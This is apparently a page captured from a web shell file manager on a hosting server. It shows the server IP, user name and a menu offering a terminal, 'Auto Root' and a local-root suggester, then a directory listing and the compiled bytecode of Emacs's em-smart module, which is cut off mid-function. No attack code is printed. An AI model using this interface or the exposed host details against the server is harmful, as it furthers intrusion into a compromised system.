Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
emacs /
24.3 /
lisp /
eshell /
Delete
Unzip
Name
Size
Permission
Date
Action
em-alias.elc
6.23
KB
-rw-r--r--
2023-06-07 04:13
em-banner.elc
1.69
KB
-rw-r--r--
2023-06-07 04:13
em-basic.elc
4.15
KB
-rw-r--r--
2023-06-07 04:13
em-cmpl.elc
10.67
KB
-rw-r--r--
2023-06-07 04:13
em-dirs.elc
15.43
KB
-rw-r--r--
2023-06-07 04:13
em-glob.elc
8.45
KB
-rw-r--r--
2023-06-07 04:13
em-hist.elc
28.48
KB
-rw-r--r--
2023-06-07 04:13
em-ls.elc
26.68
KB
-rw-r--r--
2023-06-07 04:13
em-pred.elc
15.36
KB
-rw-r--r--
2023-06-07 04:13
em-prompt.elc
5.37
KB
-rw-r--r--
2023-06-07 04:13
em-rebind.elc
7.36
KB
-rw-r--r--
2023-06-07 04:13
em-script.elc
4.12
KB
-rw-r--r--
2023-06-07 04:13
em-smart.elc
8.38
KB
-rw-r--r--
2023-06-07 04:13
em-term.elc
3.55
KB
-rw-r--r--
2023-06-07 04:13
em-unix.elc
37.2
KB
-rw-r--r--
2023-06-07 04:13
em-xtra.elc
4.77
KB
-rw-r--r--
2023-06-07 04:13
esh-arg.elc
10.64
KB
-rw-r--r--
2023-06-07 04:13
esh-cmd.elc
37.2
KB
-rw-r--r--
2023-06-07 04:13
esh-ext.elc
9.88
KB
-rw-r--r--
2023-06-07 04:13
esh-groups.el
7.47
KB
-rw-r--r--
2023-06-07 04:00
esh-io.elc
13.17
KB
-rw-r--r--
2023-06-07 04:13
esh-mode.elc
29.08
KB
-rw-r--r--
2023-06-07 04:13
esh-module.elc
2.65
KB
-rw-r--r--
2023-06-07 04:13
esh-opt.elc
7.32
KB
-rw-r--r--
2023-06-07 04:13
esh-proc.elc
16.24
KB
-rw-r--r--
2023-06-07 04:13
esh-util.elc
19.55
KB
-rw-r--r--
2023-06-07 04:13
esh-var.elc
14.92
KB
-rw-r--r--
2023-06-07 04:13
eshell.elc
7.25
KB
-rw-r--r--
2023-06-07 04:13
Save
Rename
;ELC ;;; Compiled by mockbuild@buildfarm06.corp.cloudlinux.com on Wed Jun 7 08:13:47 2023 ;;; from file /builddir/build/BUILD/emacs-24.3/lisp/eshell/em-smart.el ;;; in Emacs version 24.3.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301\302\303\304\305\306\307&\210\310\311\302\312\313\314\315\316\306\301& \210\310\317\320\321\315\316\306\301&\210\310\322\302\323\315\324\306\301&\210\310\325\326\327\315\330\306\301&\210\310\331\332\333\315\334\306\301&\210\310\335\336\337\315\340\306\301&\207" [custom-declare-group eshell-smart nil "This module combines the facility of normal, modern shells with\nsome of the edit/review concepts inherent in the design of Plan 9's\n9term. See the docs for more details.\n\nMost likely you will have to turn this option on and play around with\nit to get a real sense of how it works." :tag "Smart display of output" :group eshell-module custom-declare-variable eshell-smart-load-hook "A list of functions to call when loading `eshell-smart'." :version "24.1" :type hook eshell-smart-unload-hook (list #'(lambda nil (remove-hook 'window-configuration-change-hook 'eshell-refresh-windows))) "A hook that gets run when `eshell-smart' is unloaded." eshell-review-quick-commands "If t, always review commands.\nReviewing means keeping point on the text of the command that was just\ninvoked, to allow corrections to be made easily.\n\nIf set to nil, quick commands won't be reviewed. A quick command is a\ncommand that produces no output, and exits successfully.\n\nIf set to `not-even-short-output', then the definition of \"quick\ncommand\" is extended to include commands that produce output, if and\nonly if that output can be presented in its entirely in the Eshell window." (choice (const :tag "No" nil) (const :tag "Yes" t) (const :tag "Not even short output" not-even-short-output)) eshell-smart-display-navigate-list '(insert-parentheses mouse-yank-at-click mouse-yank-primary mouse-yank-secondary yank-pop yank-rectangle yank) "A list of commands which cause Eshell to jump to the end of buffer." (repeat function) eshell-smart-space-goes-to-end t "If non-nil, space will go to end of buffer when point-max is visible.\nThat is, if a command is running and the user presses SPACE at a time\nwhen the end of the buffer is visible, point will go to the end of the\nbuffer and smart-display will be turned off (that is, subsequently\npressing backspace will not cause the buffer to scroll down).\n\nThis feature is provided to make it very easy to watch the output of a\nlong-running command, such as make, where it's more desirable to see\nthe output go by than to review it afterward.\n\nSetting this variable to nil means that space and backspace will\nalways have a consistent behavior, which is to move back and forth\nthrough displayed output. But it also means that enabling output\ntracking requires the user to manually move point to the end of the\nbuffer using \\[end-of-buffer]." boolean eshell-where-to-jump 'begin "This variable indicates where point should jump to after a command.\nThe options are `begin', `after' or `end'." (radio (const :tag "Beginning of command" begin) (const :tag "After command word" after) (const :tag "End of command" end))] 10) (defvar eshell-smart-displayed nil) (defvar eshell-smart-command-done nil) (defvar eshell-currently-handling-window nil) #@29 Setup Eshell smart display. (defalias 'eshell-smart-initialize #[nil "?\205P \305\301!\210\306\305\302!\210\306\305\303!\210\307\310\311\312\306\307$\210\310\313\314\"\210\310\315\314\307\211$\210\310\316\317\306\307$\210\310\320\321\306\307$\210\305\322!\210\310\323\324\307\211$\210\f\307=?\205P \310\323\325\306\307$\207" [eshell-non-interactive-p eshell-scroll-to-bottom-on-output eshell-scroll-to-bottom-on-input eshell-scroll-show-maximum-output eshell-review-quick-commands make-local-variable nil t add-hook window-scroll-functions eshell-smart-scroll-window window-configuration-change-hook eshell-refresh-windows eshell-output-filter-functions after-change-functions eshell-disable-after-change eshell-input-filter-functions eshell-smart-display-setup eshell-smart-command-done eshell-post-command-hook #[nil "\301\211\207" [eshell-smart-command-done t] 2] eshell-smart-maybe-jump-to-end] 5 (#$ . 3681)]) #@45 Scroll the given Eshell window accordingly. (defalias 'eshell-smart-scroll-window #[(wind start) "?\205 \304\211\305 r\306\216\307!\210\310 -\207" [eshell-currently-handling-window inhibit-point-motion-hooks save-selected-window--state wind t internal--before-save-selected-window ((internal--after-save-selected-window save-selected-window--state)) select-window eshell-smart-redisplay] 2 (#$ . 4607)]) #@37 Refresh all visible Eshell buffers. (defalias 'eshell-refresh-windows #[(&optional frame) "\303\304\305\306 #\210\205 \303\211\307\310\217))\207" [affected frame window-scroll-functions nil walk-windows #[(wind) "r\304!q\210 \205 \305\306\307 \"\210\310\211))\207" [wind eshell-mode window-scroll-functions affected window-buffer nil eshell-smart-scroll-window window-start t] 3] 0 (byte-code "\300\301\211\"\207" [sit-for 0] 3) ((error))] 5 (#$ . 5023)]) #@66 Set the point to somewhere in the beginning of the last command. (defalias 'eshell-smart-display-setup #[nil "\304=\203\f b\210\2027 \305=\203&